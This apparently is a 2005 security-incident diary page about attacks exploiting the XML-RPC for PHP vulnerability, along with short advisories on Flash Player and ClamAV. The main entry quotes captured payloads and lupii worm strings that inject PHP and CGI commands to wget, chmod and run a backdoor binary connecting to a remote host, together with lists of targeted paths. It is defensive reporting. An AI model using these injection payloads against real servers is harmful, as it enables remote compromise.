XML-RPC for PHP Vulnerability Attack

Published: 2005-11-05. Last Updated: 2005-11-07 08:25:28 UTC
by Koon Yaw Tan (Version: 1)
0 comment(s)
We have received a few reports on an attack exploiting xml-rpc for php vulnerability.

xml-rpc for php is used in a large number of popular web applications such as PostNuke, Drupal, b2evolution, Xoops, WordPress, PHPGroupWare and TikiWiki. When exploited, this could compromise a vulnerable system. Most of these packages should have xml-rpc for php vulnerability fixed in the latest version. If you are still running an old version, you should get it updated immediately.

From the submitted logs, it attempts to wget a remote access Trojan from one system and using the Trojan to try to connect to another site via port 8080.

Sample logs as shown:
000 : 50 4F 53 54 20 2F 70 68 70 67 72 6F 75 70 77 61   POST /phpgroupwa
010 : 72 65 2F 78 6D 6C 72 70 63 2E 70 68 70 20 48 54   re/xmlrpc.php HT
020 : 54 50 2F 31 2E 31 0A 48 6F 73 74 3A 20 32 xx 2E   TP/1.1.Host: xx.
030 : xx xx xx 2E 39 34 2E 32 32 32 0A 43 6F 6E 74 65   xxx.94.222.Conte
040 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 78 6D   nt-Type: text/xm
050 : 6C 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68   l.Content-Length
060 : 3A 32 36 39 0A 0A 3C 3F 78 6D 6C 20 76 65 72 73   :269..<?xml vers
070 : 69 6F 6E 3D 22 31 2E 30 22 3F 3E 3C 6D 65 74 68   ion="1.0"?><meth
080 : 6F 64 43 61 6C 6C 3E 3C 6D 65 74 68 6F 64 4E 61   odCall><methodNa
090 : 6D 65 3E 74 65 73 74 2E 6D 65 74 68 6F 64 3C 2F   me>test.method</
0a0 : 6D 65 74 68 6F 64 4E 61 6D 65 3E 3C 70 61 72 61   methodName><para
0b0 : 6D 73 3E 3C 70 61 72 61 6D 3E 3C 76 61 6C 75 65   ms><param><value
0c0 : 3E 3C 6E 61 6D 65 3E 27 2C 27 27 29 29 3B 65 63   ><name>',''));ec
0d0 : 68 6F 20 27 5F 62 65 67 69 6E 5F 27 3B 65 63 68   ho '_begin_';ech
0e0 : 6F 20 60 63 64 20 2F 74 6D 70 3B 77 67 65 74 20   o `cd /tmp;wget
0f0 : xx xx xx 2E xx xx xx 2E 32 35 35 2E 34 34 2F 63   xxx.xxx.255.44/c
100 : 62 61 63 6B 3B 63 68 6D 6F 64 20 2B 78 20 63 62   back;chmod +x cb
110 : 61 63 6B 3B 2E 2F 63 62 61 63 6B 20 xx xx 2E xx   ack;./cback xx.x
120 : xx 2E xx xx xx 2E 31 34 20 38 30 38 30 60 3B 65   x.xxx.14 8080`;e
130 : 63 68 6F 20 27 5F 65 6E 64 5F 27 3B 65 78 69 74   cho '_end_';exit
140 : 3B 2F 2A 3C 2F 6E 61 6D 65 3E 3C 2F 76 61 6C 75   ;/*</name></valu
150 : 65 3E 3C 2F 70 61 72 61 6D 3E 3C 2F 70 61 72 61   e></param></para
160 : 6D 73 3E 3C 2F 6D 65 74 68 6F 64 43 61 6C 6C 3E   ms></methodCall>

The following xmlrpc.php attempts are seen:
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/b2evo/xmlsrv/xmlrpc.php
/b2/xmlsrv/xmlrpc.php
/blogtest/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blogs/xmlrpc.php
/community/xmlrpc.php
/drupal/xmlrpc.php
/blog/xmlrpc.php
/services/xmlrpc.php
/xmlsrv/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlrpc.php

A scan from VirusTotal detects "cback" as:
Antivirus     Version     Update         Result
Fortinet     2.48.0.0     11.04.2005     Linux/Rev.B-bdr
Kaspersky     4.0.2.24     11.05.2005     Backdoor.Linux.Small.al
McAfee         4620         11.04.2005     Linux/BackDoor-Rev.b

We have earlier reported this observation.

Another submission from Morten gives a slightly different binary (lupii) but is exploiting the same vulnerability.

Part of the strings in this malware (lupii) is shown below:
Port is in use
Operation pending
Unknown
webmaster@mydomain.com
.hlp
find / -type f
/proc
/dev
/bin
GET %s?|cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`xx.xx.193.244/lupii;chmod$IFS+
x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`xx.xx.193.244| HTTP/1.1

Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
GET %sawstats.pl?configdir=|echo;echo%%20YYY;cd%%20%%2ftmp%%3bwget%%20xx
%%2exx%%2e193%%2e244%%2flupii%%3bchmod%%20%%2bx%%20lupii%%3b%%2e
%%2flupii%%20xx%%2exx%%2e193%%2e244;
echo%%20YYY;echo|  HTTP/1.1

Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
POST %s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length:269
<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params>
<param><value><name>',''));echo '_begin_';echo `cd /tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*</name></value></param></params>
</methodCall>

/cgi-bin/
/scgi-bin/
/awstats/
/cgi-bin/awstats/
/scgi-bin/awstats/
/cgi/awstats/
/scgi/awstats/
/scripts/
/cgi-bin/stats/
/scgi-bin/stats/
/stats/
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
/blog/xmlrpc.php
/drupal/xmlrpc.php
/community/xmlrpc.php
/blogs/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogtest/xmlsrv/xmlrpc.php
/b2/xmlsrv/xmlrpc.php
/b2evo/xmlsrv/xmlrpc.php
/wordpress/xmlrpc.php
/phpgroupware/xmlrpc.php
/cgi-bin/includer.cgi
/scgi-bin/includer.cgi
/includer.cgi
/cgi-bin/include/includer.cgi
/scgi-bin/include/includer.cgi
/cgi-bin/inc/includer.cgi
/scgi-bin/inc/includer.cgi
/cgi-local/includer.cgi
/scgi-local/includer.cgi
/cgi/includer.cgi
/scgi/includer.cgi
/hints.pl
/cgi/hints.pl
/scgi/hints.pl
/cgi-bin/hints.pl
/scgi-bin/hints.pl
/hints/hints.pl
/cgi-bin/hints/hints.pl
/scgi-bin/hints/hints.pl
/webhints/hints.pl
/cgi-bin/webhints/hints.pl
/scgi-bin/webhints/hints.pl
/hints.cgi
/cgi/hints.cgi
/scgi/hints.cgi
/cgi-bin/hints.cgi
/scgi-bin/hints.cgi
/hints/hints.cgi
/cgi-bin/hints/hints.cgi
/scgi-bin/hints/hints.cgi
/webhints/hints.cgi
/cgi-bin/webhints/hints.cgi
/scgi-bin/webhints/hints.cgi
/dev/null
Error: %s
Insufficient memory
%d.%d.%d.%d
Unable to execute command
127.0.0.1
Size must be less than or equal to 9216
Cannot packet local networks

<Update 1>
Luke has done a quick analysis of the assembly code of lupii and reveals that it listens and communicates on UDP/7111 in the "audp_listen" function (confirmed with netstat). Assembly segment below:

804bca5: 68 c7 1b 00 00 push   $0x1bc7
804bcaa: 68 40 4b 05 08 push   $0x8054b40
804bcaf: e8 5b e1 ff ff call   8049e0f <audp_listen>

Note that $0x1bc7 (the first argument) is 7111 in decimal. Thus, activity on this port may be indicative of infection.

Checking on port 7111, it happens that there is a spike recently too (UDP on 3 Nov 05).
http://isc.sans.org/port_details.php?port=7111
</Update 1>

<Update 2>
Another reader has another finding that it listens on UDP 7222 instead:
1. Runs on RedHat Enterprise Workstation 4.
2. Opens up udp:7222.
3. Exchanges some info with <IP_address_of_the_reporting_host> over udp 7222.
4. Remains active in the background.
5. Starts a SYN scan to port 80 on random destinations, this particular example it used a class A address, keeping the first 2 octets unchanged and changing just the last 2 octets of the address, in order from X.Y.0.0 to X.Y.z.w.
6. It doesn't seem to be downloading anything from the Internet.
7. It tries several ways to infect the scanned system, all are based on CGI command execution/code injection: awstats.pl, webhints, xml-rp for php etc.

A check on the md5sum on the two lupii copies received, the md5sum are different. Thus, it could be another variant.

md5sum c9cd7949a358434bfdd8d8f002c7996b: listen on UDP 7111
md5sum df0e169930103b504081aa1994be870d: listen on UDP 7222
md5sum 31a1920b320cd52f684ffb984ef2b05a: listen on UDP 7222

BTW the reader points out that "lupii" means in Romanian "The Wolves".
</Update 2>

<Update 3>
Antivirus vendors are starting to come out with signatures to detect this malware:
Symantec - Linux.Plupii
McAfee - Linux/Lupper.worm
CA - Linux/Lupper.A; Linux/Lupper.B
ClamAV - Exploit.Linux.Lupii (Scan result from Virus Total)
Kaspersky - Exploit.Linux.Small.x (Scan result from VirusTotal)

Thanks to Juha-Matti for pointing this out.
</Update 3>

You can find the details of the vulnerability at:
http://www.gulftech.org/?node=research&article_id=00088-07022005
http://www.securityfocus.com/bid/14088/
http://secunia.com/advisories/15852/

For a list of vulnerable applications, please refer to:
http://www.securityfocus.com/bid/14088/info
http://www.osvdb.org/17793

If you are running a vulnerable version, you are advised to upgrade immediately:
http://www.securityfocus.com/bid/14088/solution

If you are running Snort, the Snort ID is 3827 (WEB-PHP xmlrpc.php post attempt).

Thanks to Keith, Morten, Luke and many many other readers for their submission and sharing.

We will post updates when available. If you have any new findings or experience the same attack, do send us a note at our contact page.

Keywords:
0 comment(s)

Macromedia Flash Player Vulnerability

Published: 2005-11-05. Last Updated: 2005-11-06 02:40:44 UTC
by Koon Yaw Tan (Version: 1)
0 comment(s)
There is a vulnerability discovered in Macromedia Flash Player 7 and earlier version, which when exploited could lead to execution of arbitrary code. One possible attack is through malicious SWF file placed on website.

If you have already upgraded to Flash Player 8, then you are not affected by this vulnerability. Otherwise, do upgrade as soon as possible.

http://www.macromedia.com/devnet/security/security_zone/mpsb05-07.html
http://www.securityfocus.com/bid/15332/

Affected version information:
Macromedia lists:
Affected Software Versions
Flash Player 7.0.19.0 and earlier
Macromedia recommends all Flash Player 7 and earlier users upgrade to this new version, which can be downloaded from the Macromedia Player Download Center.


Keywords:
0 comment(s)

Podcast Interview with Marty Roesch

Published: 2005-11-05. Last Updated: 2005-11-05 11:16:48 UTC
by Koon Yaw Tan (Version: 1)
0 comment(s)
Paul has shared with us on the recent interview with Marty Roesch conducted at SANS Network Security 2005, LA. Marty talks about the history of Snort, the recent Back Orifice pre-processor vulnerability and technologies at Sourcefire.

The interview can be found at:
http://pauldotcom.com/podcast/

There are other podcast too. Thanks Paul!


Keywords:
0 comment(s)

MS November Security Bulletin Advance Notification

Published: 2005-11-05. Last Updated: 2005-11-05 11:09:17 UTC
by Koon Yaw Tan (Version: 1)
0 comment(s)
Microsoft is planning to release one security bulletin affecting Microsoft Windows on 8 Nov 05. The highest Maximum Severity rating for this bulletin is Critical.

http://www.microsoft.com/technet/security/bulletin/advance.mspx
Keywords:
0 comment(s)

ClamAV 0.87.1 released, fixes multiple security vulnerabilities

Published: 2005-11-05. Last Updated: 2005-11-05 06:25:33 UTC
by Bojan Zdrnja (Version: 1)
0 comment(s)
Vulnerabilities in anti virus programs seem to be popular lately.
A new version of ClamAV, 0.87.1, has been released. It addresses several security vulnerabilities.

The most critical one allows remote attackers to execute arbitrary code by supplying a malformed file to vulnerable ClamAV installations. The specific flaw is in the part which unpacks executable files compressed with FSG packer v1.33.

Besides this, the released version also fixes two DoS vulnerabilities published by iDefense.

Since ClamAV is often used to scan e-mail attachments on gateways (and therefore practically any user can send a malicious file which will be parsed by the gateway), although we have not yet had reports about exploits for this vulnerability, you should be proactive and install the new version.

The latest version can be downloaded from
http://prdownloads.sourceforge.net/clamav/clamav-0.87.1.tar.gz?download


Keywords:
0 comment(s)

Comments


Diary Archives